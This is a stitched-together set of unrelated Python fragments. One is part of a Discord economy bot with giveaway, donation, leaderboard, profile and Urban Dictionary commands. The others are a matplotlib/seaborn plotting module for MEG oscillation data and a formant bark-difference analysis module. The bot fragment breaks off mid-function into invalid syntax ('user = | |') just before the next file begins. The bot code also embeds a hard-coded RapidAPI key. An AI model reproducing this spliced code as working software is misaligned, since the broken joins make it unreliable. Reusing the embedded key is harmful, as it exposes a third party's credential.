    # NOTE(review): `member` is unused while the role1/role2 actions below
    # are commented out.
    member = bot.get_user(848358845620813905)
    ace = ctx.author
    await ace.add_roles(role3)
    '''await role1.delete()
    await member.add_roles(role2)'''
    await ctx.send('Done!')
@bot.command()
@commands.check(is_not_blacklisted)
async def giveaways(ctx, page=1):
    """List this guild's active giveaways, five per page.

    BUG FIX: the original computed pagination values (`amount`, `refract`)
    but never applied them — every page showed every giveaway.  Entries are
    now sliced to the requested page of five.
    """
    with open("data/gaw.json","r") as f:
        gaw = json.load(f)
    # Keep only giveaways belonging to the invoking guild.
    entries = [gaw[item] for item in gaw if gaw[item]["guild"] == ctx.guild.id]
    start = (page - 1) * 5
    embed = discord.Embed(title=f"Giveaways in {ctx.guild.name}",description="**Active Giveaways:**",color=ctx.author.color)
    for entry in entries[start:start + 5]:
        channelid = entry["channel"]
        prize = entry["prize"]
        embed.add_field(name=prize,value=f"Channel: <#{channelid}>")
    await ctx.send(embed=embed)
@bot.command()
@commands.check(is_not_blacklisted)
@commands.check(is_staff)
async def donations(ctx,user:discord.Member=None):
    """Show how much the given member (default: the invoker) has donated."""
    target = ctx.author if user is None else user
    await funcs.open_donation(target)
    records = funcs.load_donation()
    amount = records[str(target.id)]["donations"]
    summary = discord.Embed(title=f"{target.name}'s donations",description = f"**Amount Donated:** `{amount}`",color=target.color)
    await ctx.send(embed=summary)
@bot.command(aliases=["donationadd"])
@commands.check(is_not_blacklisted)
@commands.check(is_staff)
async def dadd(ctx,user:discord.Member,amount:int):
    """Staff command: credit `amount` donation points to `user`."""
    # Make sure a record exists, then bump the stored total.
    await funcs.open_donation(user)
    records = funcs.load_donation()
    key = str(user.id)
    records[key]["donations"] = records[key]["donations"] + amount
    # Persist the updated ledger back to disk.
    with open("data/donations.json","w") as fp:
        json.dump(records,fp)
    await ctx.send(f"Successfully added {amount} to {user.name}'s donations")
@bot.command(aliases=["donationremove"])
@commands.check(is_not_blacklisted)
@commands.check(is_staff)
async def drm(ctx,user:discord.Member,amount:int):
    """Staff command: deduct `amount` donation points from `user`."""
    # Make sure a record exists, then lower the stored total.
    await funcs.open_donation(user)
    records = funcs.load_donation()
    key = str(user.id)
    records[key]["donations"] = records[key]["donations"] - amount
    # Persist the updated ledger back to disk.
    with open("data/donations.json","w") as fp:
        json.dump(records,fp)
    await ctx.send(f"Successfully minused {amount} from {user.name}'s donations")
@bot.command(aliases = ["lb"])
@commands.check(is_not_blacklisted)
async def leaderboard(ctx,x = 5):
    """Show the top `x` users ranked by coin balance.

    Fixes over the original implementation:
    * ties no longer overwrite each other — the old code keyed a dict by
      coin amount, so two users with equal balances collided;
    * users the bot cannot resolve (left the guild / not cached, where
      `bot.get_user` returns None) are skipped instead of raising
      AttributeError on `None.name`.
    """
    users = funcs.get_users_data()
    # (amount, user_id) pairs, richest first; sorting pairs preserves ties.
    ranked = sorted(
        ((data["coins"], int(uid)) for uid, data in users.items()),
        reverse=True,
    )
    em = discord.Embed(title = f"Top {x} People" , description = "Nice job",color = discord.Color(0xfa43ee))
    index = 1
    for amt, id_ in ranked:
        member = bot.get_user(id_)
        if member is None:
            continue
        em.add_field(name = f"{index}. {member.name}" , value = f"{amt} {bot.cur}", inline = False)
        if index == x:
            break
        index += 1
    await ctx.send(embed = em)
@bot.command(name='user', aliases=['self', 'userstats'])
@commands.check(is_not_blacklisted)
async def user(ctx, user:discord.Member=None):
    """Show a profile card for `user` (defaults to the invoker): badges,
    account/join dates, and the bot-economy balance, themed with the
    dominant colour of the user's avatar."""
    if not user:
        user=ctx.author
    url = user.avatar_url
    funcs.open_user(user)
    users = funcs.get_users_data()
    amount = users[str(user.id)]["coins"]
    r = requests.get(url, allow_redirects=True)
    # BUGFIX: close the temp avatar file instead of leaking the handle.
    with open('tempimg.gif', 'wb') as img:
        img.write(r.content)
    color_thief = ColorThief('tempimg.gif')
    # Dominant avatar colour used to theme the embed.
    dominant_color = color_thief.get_color(quality=1)
    # NOTE: '%-d' (no zero padding) is glibc-specific; use '%#d' on Windows.
    created_at = user.created_at.strftime('%-d %b %Y')
    joined_at = user.joined_at.strftime('%-d %b %Y')
    now = datetime.datetime.now() + datetime.timedelta(seconds = 60 * 3.4)
    # ColorThief returns an (r, g, b) tuple — unpack it directly instead of
    # round-tripping through str() parsing as the original did.
    x, y, z = dominant_color[:3]
    badges = []
    # An animated (GIF) avatar implies the user has Nitro.
    if r.headers.get('content-type') == "image/gif":
        badges.append("<:nitro:847058195037028382>")
    # BUGFIX: bravery/balance emoji were swapped in the original checks.
    if user.public_flags.hypesquad_bravery:
        badges.append("<:hypesquad_bravery:847052433116495872>")
    if user.public_flags.hypesquad_balance:
        badges.append("<:hypesquad_balance:847052433250713620>")
    if user.public_flags.hypesquad_brilliance:
        badges.append("<:hypesquad_brilliance:847052433708285963>")
    cretimeago = timeago.format(user.created_at, now)
    jointimeago = timeago.format(user.joined_at, now)
    # Idiom fix: join the badge emoji instead of str(list) + replace chains.
    final1 = " ".join(badges)
    embed = discord.Embed(title=user.name, description = f'{final1}\n\n**Joined Discord on:** {created_at} ({cretimeago})\n**Joined {ctx.guild.name} on:** {joined_at} ({jointimeago})', colour = discord.Color.from_rgb(x,y,z))
    embed.add_field(name='Bot Related UserInfo', value = f"**{currencyname}** {amount} {bot.cur}")
    embed.timestamp = datetime.datetime.utcnow()
    embed.set_thumbnail(url=user.avatar_url)
    await ctx.send(embed=embed)
@bot.command(name='define', aliases = ['lookup', 'urban'])
@commands.check(is_not_blacklisted)
async def _define(ctx, to_define:str=None):
    """Look `to_define` up on Urban Dictionary and post the top result."""
    if not to_define:
        return await ctx.send('What should I define???')
    url = "https://mashape-community-urban-dictionary.p.rapidapi.com/define"
    querystring = {"term":to_define}
    # SECURITY: this RapidAPI key is hard-coded in source; move it to an
    # environment variable / config file and rotate the exposed key.
    headers = {
        'x-rapidapi-key': "5be05ffb96mshfe7579bba5baf5ap1b6240jsnad885dc354f3",
        'x-rapidapi-host': "mashape-community-urban-dictionary.p.rapidapi.com"
        }
    response = requests.request("GET", url, headers=headers, params=querystring)
    results = response.json()["list"]
    # BUGFIX: guard against terms with no definitions; the original indexed
    # [0] unconditionally and raised IndexError on an empty result list.
    if not results:
        return await ctx.send(f"No definition found for {to_define}")
    main = results[0]
    word = main["word"]
    definition = main["definition"]
    example = main["example"]
    url = main["permalink"]
    auth = main["author"]
    up = main["thumbs_up"]
    down = main["thumbs_down"]
    embed = discord.Embed(title=f"Definition of {word}",url=url, description = definition, colour = bot.color)
    embed.add_field(name='Example', value = example, inline=False)
    embed.add_field(name='** **', value=f"{up} 👍\n\n{down} 👎")
    embed.set_footer(text=f"Requested by {ctx.author.name} | Sent by {auth}", icon_url=ctx.author.avatar_url)
    embed.set_thumbnail(url="https://cdn.discordapp.com/attachments/847409923166830612/847853404999254056/Urban-Dictionary.png")
    embed.timestamp = datetime.datetime.utcnow()
    await ctx.send(embed=embed)
@bot.command(name='bal', aliases = ['balance'])
@commands.check(is_not_blacklisted)
async def _bal(ctx, user:discord.Member=None):
    """Show the coin balance of `user` (defaults to the invoker)."""
    # Economy commands are restricted to the designated bot channel;
    # elsewhere we post a short notice and clean it up after 5 seconds.
    if not constants.Getters.get_usage_status(ctx):
        msg = await ctx.send('you cannot use commands here, use it in <#847409923166830612>.')
        await asyncio.sleep(5)
        return await msg.delete()
    target = user or ctx.author
    funcs.open_user(target)
    balances = funcs.get_users_data()
    coins = balances[str(target.id)]["coins"]
    embed = discord.Embed(title=f"{target.name}'s Points", description = f"**{currencyname}** {coins} {bot.cur}", color = bot.color)
    await ctx.send(embed=embed)
@bot.command(name='beg')
@commands.cooldown(1,30, commands.BucketType.user)
@commands.check(is_not_blacklisted)
async def _beg(ctx):
    """Hand the invoker a random 0-9 coin payout (30 second cooldown)."""
    # Economy commands are restricted to the designated bot channel.
    if not constants.Getters.get_usage_status(ctx):
        msg = await ctx.send('you cannot use commands here, use it in <#847409923166830612>.')
        await asyncio.sleep(5)
        return await msg.delete()
    beggar = ctx.author
    translations = ["Humans have become cheaper than us, dogs", "Unable to Translate (too many swears)", "Ew Gross Human, here take some", "Humans dominated us for ages. Now they are begging from us. That's Karma."]
    line = random.choice(translations)
    payout = random.randrange(0,10)
    embed= discord.Embed(title="Bark Bark Bark, Barkk", description = f"**Translation:** {line}\nThe doggo gave you {payout} coins.", color = bot.color)
    await ctx.send(embed=embed)
    # Credit the payout and persist the bank file.
    funcs.open_user(beggar)
    ledger = funcs.get_users_data()
    ledger[str(beggar.id)]["coins"] += payout
    with open('data/bank.json','w') as fp:
        json.dump(ledger,fp)
@bot.command(name='drop')
@commands.check(is_botdev)
@commands.check(is_not_blacklisted)
async def _drop(ctx, amount:int):
    """Bot-dev command: drop `amount` coins, claimed either by typing a
    phrase or by reacting, and credit the winner's balance.

    Fixes over the original: the builtin name `type` is no longer
    shadowed, and an unclaimed drop (30s timeout) no longer crashes the
    command with an unhandled asyncio.TimeoutError.
    """
    await ctx.message.delete()
    drop_kind = random.choice(['msg', 'react'])
    if drop_kind == 'msg':
        msgs = ["percy sux", "levi sux", "make me admin"]
        msg1 = random.choice(msgs)
        embed = discord.Embed(title = f'{currencyname} Drop!', description = f'Type `{msg1}` to get {amount} {currencyname}!', colour = bot.color)
        await ctx.send(embed=embed)
        def check(msg):
            return msg.content == msg1
        try:
            msg = await bot.wait_for('message', check=check, timeout=30)
        except asyncio.TimeoutError:
            return await ctx.send('Nobody claimed the drop in time!')
        winner = msg.author
    else:
        embed = discord.Embed(title = f'{currencyname} Drop!', description = f'React to get {amount} {currencyname}!', colour = bot.color)
        main=await ctx.send(embed=embed)
        await main.add_reaction("<a:Winkles_1:824695592194015245>")
        def check(reaction, reactor):
            # Ignore reactions from bot accounts.
            return reactor.bot != True
        try:
            _, winner = await bot.wait_for('reaction_add', check=check, timeout=30)
        except asyncio.TimeoutError:
            return await ctx.send('Nobody claimed the drop in time!')
    await ctx.send(f"{winner.mention} Just got {amount} {currencyname}! GG!\nYou can trade these in for DMC (coming soon)")
    # Credit the winner and persist the bank file (shared by both branches).
    funcs.open_user(winner)
    users = funcs.get_users_data()
    users[str(winner.id)]["coins"] += amount
    with open('data/bank.json','w') as f:
        json.dump(users,f)
@bot.command(aliases=["inv"])
@commands.check(is_not_blacklisted)
async def bag(ctx,member:discord.Member=None):
funcs.open_user(ctx.author)
user = | |
<gh_stars>0
"""OM - plots for MEG data."""
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from om.plts.fig_info import FigInfo
from om.plts.utils import set_axis_spines, save_figure
from om.core.errors import UnknownDataTypeError
###################################################################################################
###################################################################################################
############################## OM - PLTS - MEGDATA PLOTS ##############################
def plot_exponents(exponents, title, save_out=False, fig_info=FigInfo()):
    """Plots a histogram of the chi values for all vertices.

    Parameters
    ----------
    exponents : 1d array
        A vector of aperiodic exponent values to plot.
    title : str
        A string to append to the title.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    fig_info : FigInfo, optional
        Figure styling settings (fonts, line widths, title toggle).
        NOTE(review): the default instance is created once at import time
        and shared across calls — harmless if FigInfo is never mutated;
        confirm.
    """

    # Plot Settings
    n_bins = 150              # Number of bins for histograms
    t_fs = fig_info.t_fs      # Title font size
    ax_fs = fig_info.ax_fs    # Axis label font size
    ti_fs = fig_info.ti_fs    # Axis ticks font size

    # Set up plot
    fig, ax = plt.subplots(figsize=[6, 4])

    # Create histogram
    ax.hist(exponents, n_bins, color='#40425e')

    # Add title
    if fig_info.add_title:
        plt.title('Exponents - ' + title, {'fontsize': t_fs})

    # Add axis labels
    ax.set_xlabel('Exponent', {'fontsize': ax_fs})
    ax.set_ylabel('Count', {'fontsize': ax_fs})

    # Set ticks font size
    plt.tick_params(axis='both', which='major', labelsize=ti_fs)

    # Set spines
    set_axis_spines(ax, lw=fig_info.ax_lw)

    # Set x-lims (hard-coded display range for exponents)
    ax.set_xlim(0.0, 2.0)

    save_figure(save_out, '101-' + title + '_Exponents', fig_info)
def plot_hist_count(osc_count, save_out=False):
    """Plot a histogram of the number of oscillations found per vertex.

    Parameters
    ----------
    osc_count : 1d Vector
        An array of the number of oscillations found in each vertex.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    """

    # Figure styling comes from the shared FigInfo settings object
    fig_info = FigInfo()

    # Number of bins for the histogram
    n_bins = 25

    # Histogram of oscillation counts, clipped to the 0-8 range
    plt.hist(osc_count, n_bins, range=[0, 8])

    # Optional title
    if fig_info.add_title:
        plt.title('# Oscillations per Vertex', {'fontsize': fig_info.t_fs, 'fontweight': 'bold'})

    # Axis labels
    plt.xlabel('# Oscillations', {'fontsize': fig_info.ax_fs, 'fontweight': 'bold'})
    plt.ylabel('Count', {'fontsize': fig_info.ax_fs, 'fontweight': 'bold'})

    # Tick label size
    plt.tick_params(axis='both', which='major', labelsize=fig_info.ti_fs)

    save_figure(save_out, '102-OscCount', fig_info)
def plot_all_oscs(centers_all, powers_all, bws_all, title,
                  save_out=False, fig_info=FigInfo()):
    """Plots combined plot with distributions of oscillation centers, powers and bws.

    Parameters
    ----------
    centers_all : 1d array
        Vector of the center frequencies for all oscillations.
    powers_all : 1d array
        Vector of the powers for all oscillations.
    bws_all : 1d array
        Vector of the bandwidths for all oscillations.
    title : str
        A string to append to the title.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    fig_info : FigInfo, optional
        Figure styling settings (fonts, title toggle).
    """

    # Plot Settings
    n_bins = 160              # Number of bins for histograms
    st_fs = fig_info.t_fs     # Super Title Font Size
    sp_fs = fig_info.sp_fs    # Subplot Title Font Size
    ax_fs = fig_info.ax_fs    # Axis Label Font Size
    ti_fs = fig_info.ti_fs    # Axis ticks font size

    # Set up subplots: one row per oscillation parameter
    fig, ax = plt.subplots(3, 1, figsize=(15, 15))

    # Set plot super-title
    if fig_info.add_title:
        plt.suptitle('Distributions of Oscillatory Parameters - ' + title,
                     fontsize=st_fs, fontweight='bold')

    # Subplot 1 - Center Frequency
    ax[0].hist(centers_all, n_bins)
    ax[0].set_title('Center Frequency', {'fontsize': sp_fs})
    ax[0].set_xlabel('Frequency', {'fontsize': ax_fs})
    ax[0].set_ylabel('Count', {'fontsize': ax_fs})

    # Subplot 2 - Power (log10-scaled for readability)
    ax[1].hist(np.log10(powers_all), n_bins)
    ax[1].set_title('Oscillatory Power', {'fontsize': sp_fs})
    ax[1].set_xlabel('Log Power', {'fontsize': ax_fs})
    ax[1].set_ylabel('Count', {'fontsize': ax_fs})

    # Subplot 3 - Bandwidth
    ax[2].hist(bws_all, n_bins)
    ax[2].set_title('Band Width', {'fontsize': sp_fs})
    ax[2].set_xlabel('Bandwidth (Hz)', {'fontsize': ax_fs})
    ax[2].set_ylabel('Count', {'fontsize': ax_fs})

    # Set ticks font size (applies to the current — last — axes only)
    plt.tick_params(axis='both', which='major', labelsize=ti_fs)

    # Adjust subplot spacing
    plt.subplots_adjust(hspace=0.4)

    save_figure(save_out, '103-AllOscs', fig_info)
def plot_all_oscs_single(data, data_type, title, n_bins=160,
                         figsize=(15, 5), save_out=False, fig_info=FigInfo()):
    """Create a plot for a single oscillation parameter.

    Parameters
    ----------
    data : 1d array
        Vector of oscillation parameter data.
    data_type : {0, 1, 2}
        Int refers to which osc parameter is being plotted.
        Key: {0:'Center Frequency', 1:'Power', 2:'Bandwidth'}
    title : str
        A string to append to the title.
    n_bins : int, optional (default = 160)
        Number of bins to use for the plot.
    figsize : tuple, optional (default = (15, 5))
        Size of the figure to make.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    fig_info : FigInfo, optional
        Figure styling settings (fonts, title toggle).

    Raises
    ------
    UnknownDataTypeError
        If `data_type` is not one of {0, 1, 2}.
    """

    # Plot Settings
    t_fs = fig_info.t_fs      # Super Title Font Size
    ax_fs = fig_info.ax_fs    # Axis Label Font Size
    ti_fs = fig_info.ti_fs    # Axis ticks font size

    # BUGFIX: the original compared with `is 0` / `is 1` / `is 2`, which
    # tests object identity rather than equality. It only works by accident
    # of CPython's small-int caching (and is a SyntaxWarning on 3.8+);
    # use `==` for value comparison.
    if data_type == 0:
        data_title = 'Center Frequency'
        xlab = 'Frequency'
    elif data_type == 1:
        data_title = 'Power'
        xlab = 'Log Power'
        # Power is plotted on a log10 scale
        data = np.log10(data)
    elif data_type == 2:
        data_title = 'Bandwidth'
        xlab = 'Bandwidth (Hz)'
    else:
        raise UnknownDataTypeError('Data type not understood.')

    # Set up plot
    fig, ax = plt.subplots(figsize=figsize)

    # Histogram of the parameter values
    ax.hist(data, n_bins, color='#40425e', alpha=0.9)

    # Set the title
    if fig_info.add_title:
        plt.title(data_title + ' ' + title, {'fontsize': t_fs, 'fontweight': 'bold'})

    # Add axis labels
    ax.set_xlabel(xlab, {'fontsize': ax_fs})
    ax.set_ylabel('Count', {'fontsize': ax_fs})

    # Set ticks font size
    plt.tick_params(axis='both', which='major', labelsize=ti_fs)

    # Set spines
    set_axis_spines(ax, lw=fig_info.ax_lw)

    # Hard-coded x-limits, kept from the original
    #ax.set_xlim(3, max(data)+0.2)
    ax.set_xlim(2.5, 32)

    save_figure(save_out, '104-' + data_title + '_AllOscs', fig_info)
def plot_osc_param_comparison(centers_all, powers_all, bws_all, title,
                              save_out=False, fig_info=FigInfo()):
    """Plots comparisons between all oscillatory parameters.

    Checks Centers vs. Bandwidth, Centers vs. Power and Bandwidth vs. Power.

    Parameters
    ----------
    centers_all : 1d array
        Vector of the center frequencies for all oscillations.
    powers_all : 1d array
        Vector of the powers for all oscillations.
    bws_all : 1d array
        Vector of the bandwidths for all oscillations.
    title : str
        A string to append to the title.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    fig_info : FigInfo, optional
        Figure styling settings (fonts, title toggle).
    """

    # Plot Settings
    st_fs = fig_info.t_fs     # Super Title Font Size
    sp_fs = fig_info.sp_fs    # Subplot Title Font Size
    ax_fs = fig_info.ax_fs    # Axis Label Font Size
    ti_fs = fig_info.ti_fs    # Axis ticks font size
    vis_opac = 0.1            # Alpha value for plotted data

    # Set up subplots: one scatter per parameter pairing
    fig, ax = plt.subplots(3, 1, figsize=(15, 15))

    # Set plot super-title
    if fig_info.add_title:
        plt.suptitle('Oscillation Parameter Comparisons - ' + title,
                     fontsize=st_fs, fontweight='bold')

    # Plot - Center vs. Bandwidth (bandwidth log10-scaled)
    ax[0].plot(centers_all, np.log10(bws_all), '.', alpha=vis_opac)
    ax[0].set_title('Center vs. Bandwidth', {'fontsize': sp_fs, 'fontweight': 'bold'})
    ax[0].set_xlabel('Centers', {'fontsize': ax_fs})
    ax[0].set_ylabel('BW', {'fontsize': ax_fs})

    # Plot - Centers vs. Power (power log10-scaled)
    ax[1].plot(centers_all, np.log10(powers_all), '.', alpha=vis_opac)
    ax[1].set_title('Center vs. Power', {'fontsize': sp_fs, 'fontweight': 'bold'})
    ax[1].set_xlabel('Centers', {'fontsize': ax_fs})
    ax[1].set_ylabel('Log Power', {'fontsize': ax_fs})

    # Plot - BWs vs. Powers (both log10-scaled)
    ax[2].plot(np.log10(bws_all), np.log10(powers_all), '.', alpha=vis_opac)
    ax[2].set_title('BW vs. Power', {'fontsize': sp_fs, 'fontweight': 'bold'})
    ax[2].set_xlabel('Bandwidth (Hz)', {'fontsize': ax_fs})
    ax[2].set_ylabel('Log Power', {'fontsize': ax_fs})

    # Adjust subplot spacing
    plt.subplots_adjust(hspace=0.4)

    # Set ticks font size (applies to the current — last — axes only)
    plt.tick_params(axis='both', which='major', labelsize=ti_fs)

    save_figure(save_out, '105-OscComparison', fig_info)
def plot_corr_matrix(corr_data, labels, save_out=False, fig_info=FigInfo()):
    """Plot correlation data as a matrix image with a colorbar.

    Parameters
    ----------
    corr_data : 2d array
        Matrix of correlation data to plot.
    labels : list of str
        Labels for the rows & columns of `corr_data`.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    fig_info : FigInfo, optional
        Figure styling settings (fonts, title toggle).
    """

    # BUGFIX: the parameter was misspelled `corr_dat` while the function body
    # (and this docstring) used `corr_data`, so every call raised NameError.
    # The parameter now matches the documented name.

    # Plot Settings
    t_fs = fig_info.t_fs      # Title Font Size
    ti_fs = fig_info.ti_fs    # Axis ticks font size

    # Set colormap to use
    cmap = plt.get_cmap('seismic')

    # Create the plot
    #plt.matshow(corr_data, vmin=-1, vmax=1, cmap=cmap, interpolation='none')
    plt.matshow(corr_data, vmin=-1, vmax=1, cmap=cmap, interpolation='nearest')
    # Notes on using nearest here:
    #   https://github.com/matplotlib/matplotlib/issues/2972/

    # Add title
    if fig_info.add_title:
        plt.title('Osc Band Correlations', {'fontsize': t_fs, 'fontweight': 'bold'}, y=1.15)

    # Set tick labels
    nums = list(range(len(labels)))
    plt.xticks(nums, labels, rotation=45, ha='left')
    plt.yticks(nums, labels)

    # Set ticks font size
    plt.tick_params(axis='both', which='major', labelsize=ti_fs)

    # Add a colorbar - add padding to offset further from plot
    plt.colorbar(pad=0.15)

    save_figure(save_out, '106-CorrMat', fig_info)
def plot_corr_matrix_tri(corr_data, labels, save_out=False, fig_info=FigInfo()):
    """Plot the lower triangle of a correlation matrix as an annotated heatmap.

    Parameters
    ----------
    corr_data : 2d array
        Matrix of correlation data to plot.
    labels : list of str
        Labels for the rows & columns of `corr_data`.
    save_out : boolean, optional (default = False)
        Whether to save out a copy of the figure.
    fig_info : FigInfo, optional
        Figure styling settings. BUGFIX: the original referenced `fig_info`
        without defining it (NameError when saving); it is now a parameter
        with a default, matching the other plot functions in this module.
    """

    # Generate a mask for the upper triangle
    # BUGFIX: `np.bool` was deprecated in NumPy 1.20 and removed in 1.24;
    # use the builtin bool dtype instead.
    mask = np.zeros_like(corr_data, dtype=bool)
    mask[np.triu_indices_from(mask)] = True

    # Generate a custom diverging colormap
    cmap = sns.color_palette("coolwarm", 7)

    # Draw the heatmap with the mask and correct aspect ratio
    sns.heatmap(corr_data, mask=mask, cmap=cmap, annot=True, square=True,
                vmin=-1, vmax=1, xticklabels=labels, yticklabels=labels)

    save_figure(save_out, 'XX-corr_mat_tri', fig_info)
def plot_peak_boxplot(peaks, osc_band, save_out=False, fig_info=FigInfo()):
"""Plot a boxplot of peak frequencies within an oscillation band.
Parameters
----------
peaks : 1d array
Vector of peak frequencies for given oscillation band.
osc_band : str
Label of which osc band is being plotted.
save_out : boolean, optional (default = False)
Whether | |
import shutil
from pathlib import Path
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
import matplotlib.ticker as mtick
from scipy.optimize import minimize_scalar
import filter
kBarWidth = 0.2
def fitLine(row, formantName, start, end, outputDir):
    """Fit a quartic to one formant track, plot it, and return the inflection.

    Parameters
    ----------
    row : pandas Series
        One measurement row; must contain 'Filename', 'Annotation', and the
        columns `formantName_start` .. `formantName_end`.
        NOTE(review): x is fixed at 9 points (2..10), so start/end are
        assumed to span exactly 9 columns — confirm callers always pass
        start=2, end=10.
    formantName : str
        Column prefix of the formant to fit (e.g. 'F1').
    start, end : int
        First and last sample index of the formant columns to use.
    outputDir : pathlib.Path
        Directory the diagnostic plot '<key>.png' is written to.

    Returns
    -------
    pandas Series
        Single value 'Inflection_<formantName>': the x-position where the
        2nd derivative of the fitted quartic is maximal within [2, 10].
    """
    key = '@'.join([row['Filename'], row['Annotation'], formantName])
    x = np.arange(2, 11)
    y = row[formantName + '_' +
            str(start): formantName + '_' + str(end)].to_numpy(dtype='float')
    # 4th-order polynomial fit plus its first and second derivatives.
    coeff = np.polyfit(x, y, 4)
    line1 = np.poly1d(coeff)
    line1d = np.polyder(line1, 1)
    line1dd = np.polyder(line1, 2)
    # Maximize the 2nd derivative by minimizing its negation over [2, 10].
    line1dd_max = minimize_scalar(-line1dd, bounds=(2, 10), method='bounded')
    inflection = line1dd_max.x
    # Diagnostic plot: raw points, fit, derivatives, and the inflection line.
    plt.plot(x, y, 'o')
    plt.plot(x, line1(x), label='fitted line')
    plt.plot(x, line1d(x), label='1st deriv')
    plt.plot(x, line1dd(x), label='2nd deriv')
    plt.axvline(x=inflection, linestyle='dashed', label='inflection')
    plt.legend(loc='best')
    plt.title(key)
    # plt.show()
    plt.savefig(outputDir / (key + '.png'))
    # Clear figure state so the next call starts from a blank canvas.
    plt.clf()
    plt.cla()
    # return pd.Series(coeff, index=['x4', 'x3', 'x2', 'x1', 'x0'])
    return pd.Series(inflection, index=['Inflection_'+formantName])
def removeChars(s):
    """Return `s` with spaces, backslashes, slashes and carets removed.

    Uses a single str.translate pass instead of the original's four
    chained str.replace calls — same result, one traversal.
    """
    return s.translate(str.maketrans('', '', ' \\/^'))
class Analyzer(object):
    """Abstract base class for analysis pipelines.

    Subclasses must supply a display name and an analysis implementation.
    """

    def RunAnalysis(self, df, group_name, output_base_dir):
        """Run the analysis over `df`, writing results under `output_base_dir`."""
        raise NotImplementedError

    def GetName(self):
        """Return this analyzer's display name."""
        raise NotImplementedError
class FormantQuantiles(Analyzer):
    """Compute mean F1-F2 bark differences at the 25/50/75% quantile points.

    Writes '<group>.csv' (column means) and '<group>.debug.csv' (per-row
    values) into the output directory.
    """

    def GetName(self):
        """Analyzer display name."""
        return "FormantQuantiles"

    def GetInputType(self):
        """Kind of input table this analyzer consumes."""
        return "Formant"

    def RunAnalysis(self, df, group_name, output_dir):
        """Add quantile/diff columns to `df` and write summary + debug CSVs."""
        # output = df[['Filename']].copy()
        # output['Annotation'] = df[['Annotation']]
        # 25%/75% points are approximated by averaging the two adjacent
        # samples; 50% is the middle sample.
        df['barkF1_25p'] = df[['barkF1_3', 'barkF1_4']].mean(axis=1)
        df['barkF1_75p'] = df[['barkF1_8', 'barkF1_9']].mean(axis=1)
        df['barkF1_50p'] = df[['barkF1_6']]
        df['barkF2_25p'] = df[['barkF2_3', 'barkF2_4']].mean(axis=1)
        df['barkF2_75p'] = df[['barkF2_8', 'barkF2_9']].mean(axis=1)
        df['barkF2_50p'] = df[['barkF2_6']]
        # NOTE(review): 'diff_F1F1_*' is presumably a typo for 'diff_F1F2_*'
        # (it is barkF1 minus barkF2, and sibling analyzers use F1F2), but
        # renaming would change the emitted CSV headers, so it is kept.
        df['diff_F1F1_25p'] = df['barkF1_25p'] - df['barkF2_25p']
        df['diff_F1F1_50p'] = df['barkF1_50p'] - df['barkF2_50p']
        df['diff_F1F1_75p'] = df['barkF1_75p'] - df['barkF2_75p']
        output_debug = pd.concat(
            [df[['Filename']],
             df[['Annotation']],
             df.loc[:, df.columns.str.startswith("barkF1")],
             df.loc[:, df.columns.str.startswith("barkF2")],
             df.loc[:, df.columns.str.startswith("diff")],
             ], axis=1)
        # Summary: the mean of each diff column, as a one-row frame.
        output = pd.DataFrame(
            df.loc[:, df.columns.str.startswith("diff")].mean()).T
        output_path = output_dir / (group_name + '.csv')
        output_debug_path = output_dir / (group_name + '.debug.csv')
        output_debug.to_csv(output_debug_path, index=False)
        output.to_csv(output_path, index=False)
class FormantQuantilesByDemographic(Analyzer):
    """F1-F2 quantile differences, grouped by outer/inner demographic filters.

    For each outer filter value, rows matching each inner filter are pooled,
    their mean diffs are computed via ComputeMean, and a grouped bar chart
    of the 25/50/75% differences is saved per outer value.
    """

    def GetName(self):
        """Analyzer display name."""
        return "FormantQuantilesByDemographic"

    def GetInputType(self):
        """Kind of input table this analyzer consumes."""
        return "Formant"

    def RunAnalysis(self, df, outer_filters, inner_filters, group_name, output_dir):
        """Bucket rows by (outer, inner) filter match and plot/write results."""
        for outer_f in outer_filters:
            key = outer_f.GetValue()
            # inner filter value -> list of matching rows
            matched_rows = dict()
            for _, row in df.iterrows():
                if not outer_f.IsMatched(row):
                    continue
                for inner_f in inner_filters:
                    if inner_f.IsMatched(row):
                        matched_rows.setdefault(
                            inner_f.GetValue(), []).append(row)
            # Skip outer values with no matching rows at all.
            if len(matched_rows) == 0:
                continue
            # One bar group per quantile (25/50/75%); x shifts per inner key.
            x = np.arange(3)
            for k, v in matched_rows.items():
                matched_df = pd.DataFrame(v)
                full_group_name = group_name + '@' + outer_f.GetValue() + '@@' + k
                df_mean = self.ComputeMean(
                    matched_df, full_group_name, output_dir)
                y = [df_mean['diff_F1F2_25p'][0],
                     df_mean['diff_F1F2_50p'][0],
                     df_mean['diff_F1F2_75p'][0]]
                plt.bar(x, y, width=kBarWidth, label=k)
                # Shift the next series one bar-width to the right.
                x = [xval + kBarWidth for xval in x]
            plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
            plt.xticks([r + kBarWidth for r in range(3)],
                       ('25%', '50%', '75%'))
            plt.title(key)
            plt.savefig(output_dir / (group_name + '@' +
                                      key + '.png'), bbox_inches="tight")
            # Reset figure state for the next outer value.
            plt.clf()
            plt.cla()

    def ComputeMean(self, df, full_group_name, output_dir):
        """Add quantile/diff columns, write summary + debug CSVs, return means."""
        df['barkF1_25p'] = df[['barkF1_3', 'barkF1_4']].mean(axis=1)
        df['barkF1_75p'] = df[['barkF1_8', 'barkF1_9']].mean(axis=1)
        df['barkF1_50p'] = df[['barkF1_6']]
        df['barkF2_25p'] = df[['barkF2_3', 'barkF2_4']].mean(axis=1)
        df['barkF2_75p'] = df[['barkF2_8', 'barkF2_9']].mean(axis=1)
        df['barkF2_50p'] = df[['barkF2_6']]
        df['diff_F1F2_25p'] = df['barkF1_25p'] - df['barkF2_25p']
        df['diff_F1F2_50p'] = df['barkF1_50p'] - df['barkF2_50p']
        df['diff_F1F2_75p'] = df['barkF1_75p'] - df['barkF2_75p']
        output = pd.DataFrame(
            df.loc[:, df.columns.str.startswith("diff")].mean()).T
        output_path = output_dir / (full_group_name + '.csv')
        output_debug_path = output_dir / (full_group_name + '.debug.csv')
        output.to_csv(output_path, index=False)
        df.to_csv(output_debug_path, index=False)
        return output
class FormantRegression(Analyzer):
